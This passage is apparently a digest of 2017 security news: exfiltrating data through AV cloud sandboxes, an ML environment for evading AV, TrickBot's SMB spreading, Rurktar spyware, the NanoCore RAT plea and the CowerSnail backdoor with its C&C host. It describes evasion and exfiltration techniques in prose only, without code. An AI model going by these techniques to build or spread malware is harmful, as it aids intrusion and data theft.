The Satellite then performs an intentionally suspicious action to trigger endpoint AV detection and have the Satellite image file (which contains the payload) sent to the AV cloud. Next, the cloud AV executes the Satellite file in an Internet-connected sandbox and the Satellite process can attempt to exfiltrate the embedded payload using any known Internet-based exfiltration methods.

“Note that this attack is ‘noisy’ in the sense that the AV product will flag the Satellite file as suspicious and as such this may have visible impact on the user, as well as visibility in logs and records. However, for a one time exfiltration attack this will already be too late, as the payload will already be traveling to the cloud by the time this incident is investigated by flesh-and-blood analysts,” the security researchers explain.

One mitigation solution would involve blocking the AV sandboxes (both on-premise and cloud sandboxes) from accessing the Internet. This, however, may be too strict in many cases, as it would no longer allow them to observe the Internet traffic of a sample. Because of that, Internet blocking could be applied only for samples not coming from the Internet, because they do not carry enterprise endpoint-specific payloads and can’t exfiltrate anything useful from the endpoint.

“We can generalize our findings and state that sharing an executable (suspicious/malicious sample) from the organization, with the outside world in some manner (e.g. submitting the sample to a cloud analysis service or allowing such file submission) can result in data exfiltration, unless there is confidence that the sample has arrived from outside the organization and the file has not changed since its arrival,” the researchers conclude.

OpenAI Gym – A machine learning system creates ‘invisible’ malware
31.7.2017 securityaffairs 

At DEF CON hacking conference experts demonstrated how to abuse a machine learning system dubbed OpenAI Gym to create malware that can avoid detection.
We have discussed several times about the impact of Artificial Intelligence (AI) on threat landscape, from a defensive perspective new instruments will allow the early detections of malicious patterns associated with threats, from the offensive point of view machine learning tools can be exploited to create custom malware that defeats current anti-virus software.

At the recent DEF CON hacking conference, Hyrum Anderson, technical director of data science at security shop Endgame, demonstrated how to abuse a machine learning system to create malicious code that can avoid detections of security solutions.

Anderson adapted the Elon Musk’s OpenAI framework to create malware, the principle is quite simple because the system he created just makes a few changes to legitimate-looking code and convert them into malicious code.

A few modifications can deceive AV engines, the system created by the experts was named OpenAI Gym.

“All machine learning models have blind spots,” he said. “Depending on how much knowledge a hacker has they can be convenient to exploit.”

Anderson and his group created a system that applies very small changes to a legitimate code and submits it to a security checker. The analysis of the response obtained querying the security checker allowed the researchers to make lots of tiny tweaks that improved the capability of the malware to avoid the detection.

OpenAI Gym machine learning tool

The machine learning system developed by the experts ran over 100,000 samples past an unnamed security engine in 15 hours of training. The results were worrisome, 60 per cent of the malware samples past the security system’s defenses.

The code of the OpenAI Gym was published by Anderson and his team on Github.

“This is a malware manipulation environment for OpenAI’s gym. OpenAI Gym is a toolkit for developing and comparing reinforcement learning algorithms. This makes it possible to write agents that learn to manipulate PE files (e.g., malware) to achieve some objective (e.g., bypass AV) based on a reward provided by taking specific manipulation actions.” reads the description of the toolkit published on GitHub.

Anderson encouraged experts to try the OpenAI Gym and improve it.

TrickBot Trojan Gets Worm-Like Infection Powers

29.7.2017 securityweek Virus
A newly observed version of the TrickBot banking Trojan includes a worm-like malware propagation module that allows it to spread locally via Server Message Block (SMB), Flashpoint security researchers warn.

Built by the Dyre gang, TrickBot emerged last summer when it was still under development, but quickly became a fully-operational threat. By the end of last year, the Trojan had expanded operations to Asia, and was observed this year targeting private banking, payment processing and Customer Relationship Management (CRM) providers.

As part of a campaign discovered this week, TrickBot was spreading via spam emails impersonating invoices from a large international financial institution, but also included worm-like spreading capabilities, Flashpoint says.

The analyzed version, the security researchers discovered, could spread locally via SMB, could scan domains for lists of servers via NetServerEnum Windows API, and could also enumerate other computers via Lightweight Directory Access Protocol (LDAP).

The new features, however, aren’t fully implemented and the initial purported SMB exploit has not yet been observed, Flashpoint says.

The malware includes “MachineFinder” and “netscan” functions that leverage NetServer Enumeration and LDAP Enumeration functions. Thus, it can list all servers of the specified type that are visible in a domain, and can also “enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.”

Flashpoint also discovered that the Trickbot module includes strings suggesting it uses the Python implementation of the SMB protocol “pysmb” to attempt authentication on Windows 2007, Windows 7, Windows 2012, and Windows 8 operating systems. The threat leverages SMB to determine exploitation.

By leveraging the IPC (interprocess communication) share, the new TrickBot variant also attempts to spread and execute a PowerShell script to download another TrickBot sample onto shared drives and mask it as “setup[.]exe.”

“Notably, this malware does not appear to have logic to randomly scan external IPs for SMB connections – as was the case for the worm that spread the WannaCry ransomware in May 2017,” Flashpoint says.

Based on recently observed campaigns, researchers suggest that TrickBot continues to grow as a banking Trojan with global impact, targeting financial instructions across the world. Last week, Flashpoint noticed the malware adding multiple financial institutions in the United States on its target list, while also targeting users in over a dozen more countries.

After WannaCry and NotPetya brought highlighted the risks SMB and publicly available exploits pose to consumers and businesses worldwide, it’s no wonder more malware authors are experimenting with worm-like capabilities for lateral movement.

Such modules allow malware to compromise other computers on the same Local Area Network, infect more victims, and enlist machines as part of the botnet. Such worm-like infections could help the TrickBot gang conduct more account takeover (ATO) fraud.

“Even though the worm module appears to be rather crude in its present state, it is evident that the TrickBot gang learned from the global ransomware worm-like outbreaks of WannaCry and “NotPetya” and is attempting to replicate their methodology. Flashpoint assesses with moderate confidence that the TrickBot gang will likely continue to be a formidable force in the near term,” Flashpoint says.

Rurktar Malware: An Espionage Tool in Development

28.7.2017 securityweek Virus
A newly discovered spyware family that appears designed for cyber-espionage is still under development, G DATA security researchers say.

Dubbed Rurktar, the tool hasn’t had all of its functionality implemented yet, but G DATA says “it is relatively safe to say [it] is intended for use in targeted spying operations.” The malicious program could be used for reconnaissance operations, as well as to spy on infected computers users, and steal or upload files.

The spyware, researchers say, appears to originate from Russia. Some of its internal error messages are written in Russian and the IP addresses used to remotely control the tool are located in the country, which the security firm considers strong indicators of its origin.

At the moment, Rurktar packs functions that allow it to perform reconnaissance of a network infrastructure and check whether a particular machine is reachable or not, as well as to take screenshots of an infected machine’s desktop, and also download specific files from a target system. Furthermore, the program can delete files from the target machine and can also upload files to it.

“All of this points to industrial espionage - the functions that have been described so far do not have any practical application for large-scale operations, such as ransomware schemes,” G DATA explains.

The malware can also be used to enumerate usernames, computer name, and OS version; get the current preferences the malware is actively using; enumerate the UUID; list hard disks and information about them; execute a command via the command prompt; list current running processes on the computer; and terminate running processes.

Implemented functions in the configuration file include Debug (writes logfile RCS.log to the disk), Port (the port the malware connects to), IP (the IP the malware connects to), FriendlyID (a default return value being used if no UUID was enumerated), NetworkImageQ (sets the quality of the image to be delivered), CaptureDirectory (checks whether a directory exists or not), and ScreenshotEx (sets the extension type for all screenshots).

A great deal of other functions haven’t been implemented yet: CaptureMode, CaptureStart, CaptureStopProcess1, VideoCap, SkipFrames, DetectionPreBuffer, DefPass, DetectPorog, MaxCaptureFrames, WatchFiles, SendOriginPreviews, ControlExt, WatchProc, ScreenshotAutoCapture, ScreenshotPause, ProxyEnabled, and several others more.

The malware uses a wrapper called Snow.exe, which checks whether admin privileges are available or not and executes Rurktar. It can also execute a new process of itself to ask the user for admin privileges if needed. To gain persistency, the spyware installs a new service called RCSU, which is started upon reboot.

What the security researchers haven’t established yet, however, is whether the espionage tool is the work of a single individual or that of a team. Its author apparently uses a Dropbox folder as a working directory, which could suggest that there are multiple individuals cooperating on building it and are consolidating their work through a Dropbox.

“What Dropbox can also be used for by a single individual is a crude and very basic versioning system - some Dropbox accounts offer the possibility of restoring earlier versions of a file. Therefore, it can be used to track changes, but it is not ideal from a developer's stand point. Using Dropbox as a backup is, of course, also a possibility to be considered here,” G DATA notes.

Being work-in-progress, the cyber-espionage tool hasn’t spread very widely yet, but that is expected to change as soon as operational status is reached.

The few IP addresses linked to it so far are believed to have been used for testing purposes only. Additionally, the IP addresses used for remote control are expected to see increased diversity and to expand beyond the Russian space, mainly because the actors will start using or repurposing the malware for various operations.

“The Rurktar malware is yet not been found that often, but has the potential to be more popular in the coming months because of the amount of options an attacker has with this malware,” G DATA’s Nathan Stern, who performed a detailed analysis of the malware, notes (PDF).

Creator of NanoCore RAT Pleads Guilty to Aiding CyberCriminals
27.7.2017 thehackernews

A programmer who was arrested in March this year—not because he hacked someone, but because he created and distributed a remote access software that helped cyber criminals—has finally pleaded guilty.
Taylor Huddleston, 26, of Hot Springs, Arkansas, pleaded guilty on Tuesday to federal charges of aiding and abetting computer intrusions for intentionally selling a remote access tool (RAT), called NanoCore, to hackers.
NanoCore RAT happens to be popular among hackers and has been linked to instructions in at least 10 countries, among them was a high-profile assault on Middle Eastern energy firms in 2015.
NanoCore RAT, a $25 piece of remote access software, allows attackers to steal sensitive information from victim computers, such as passwords, emails, and instant messages. The RAT could even secretly activate the webcam on the victims' computers in order to spy on them.

Huddleston began developing NanoCore in late 2012, not with any malicious purpose, but with a motive to offer a low-budget remote management software for schools, IT-conscious businesses, and parents who desired to monitor their children's activities on the web.
However, according to the plea agreement, Huddleston created, marketed, and distributed two products — NanoCore RAT and Net Seal — in underground hacking forums that were extremely popular with cyber criminals around the world.
The programmer also took responsibility for creating and operating a software licensing system called "Net Seal" that was used by another suspect, Zachary Shames, to sell thousands of copies of Limitless keylogger.
"Huddleston used Net Seal to assist Zachary Shames in the distribution of malware to 3,000 people that was, in turn, used it to infect 16,000 computers," the DoJ statement reads.
In his guilty plea, Huddleston has admitted that he intended his products to be used maliciously.
Huddleston was arrested in March, almost two months before the FBI raided his house in Hot Springs, Arkansas and left with his computers after 90 minutes, only to return 8 weeks later with handcuffs.
Huddleston is now facing a maximum penalty of 10 years in prison and is scheduled to be sentenced on December 8.

CowerSnail — Windows Backdoor from the Creators of SambaCry Linux Malware
27.7.2017 thehackernews

Last month, we reported about a group of hackers exploiting SambaCry—a 7-year-old critical remote code execution vulnerability in Samba networking software—to hack Linux computers and install malware to mine cryptocurrencies.
The same group of hackers is now targeting Windows machines with a new backdoor, which is a QT-based re-compiled version of the same malware used to target Linux.
Dubbed CowerSnail, detected by security researchers at Kaspersky Labs as Backdoor.Win32.CowerSnail, is a fully-featured windows backdoor that allows its creators to remotely execute any commands on the infected systems.
Wondering how these two separate campaigns are connected?
Interestingly, the CowerSnail backdoor uses the same command and control (C&C) server as the malware that was used to infect Linux machines to mine cryptocurrency last month by exploiting the then-recently exposed SambaCry vulnerability.
Common C&C Server Location — cl.ezreal.space:20480
SambaCry vulnerability (CVE-2017-7494), named due to its similarities to the Windows SMB flaw exploited by the WannaCry ransomware that recently wreaked havoc worldwide, affected all Samba versions newer than Samba 3.5.0 released over the past seven years.
Shortly after the public revelation of its existence, SambaCry was exploited by this group of hackers to remotely install cryptocurrency mining software—"CPUminer" that mines cryptocurrencies like Bitcoin, Litecoin, Monero and others—on Linux systems.
But now, the same hackers are targeting both, Windows and Linux computers, with CPUminer by utilising computing resources of the compromised systems in order to make the profit.
"After creating two separate Trojans, each designed for a specific platform and each with its own peculiarities, it is highly probable that this group will produce more malware in the future," Sergey Yunakovsky of Kaspersky Lab said in a blog post.
In separate research, security researcher Omri Ben Bassat‏ reported about more copycat groups of hackers who are exploiting the same SambaCry vulnerability for cryptocurrency mining and installing "Tsunami backdoor," an IRC-based DDoS botnet malware that's been known for infecting Mac OS X and IoT devices in the past.
For those unaware: Samba is open-source software (re-implementation of SMB/CIFS networking protocol) that offers Linux/Unix servers with Windows-based file and print services and runs on the majority of operating systems and IoT devices.
Despite being patched in late May, the SambaCry bug is actively being exploited by hackers. Just last week, researchers spotted a new piece of malware, called SHELLBIND, exploiting the flaw to backdoor Network Attached Storage (NAS) devices.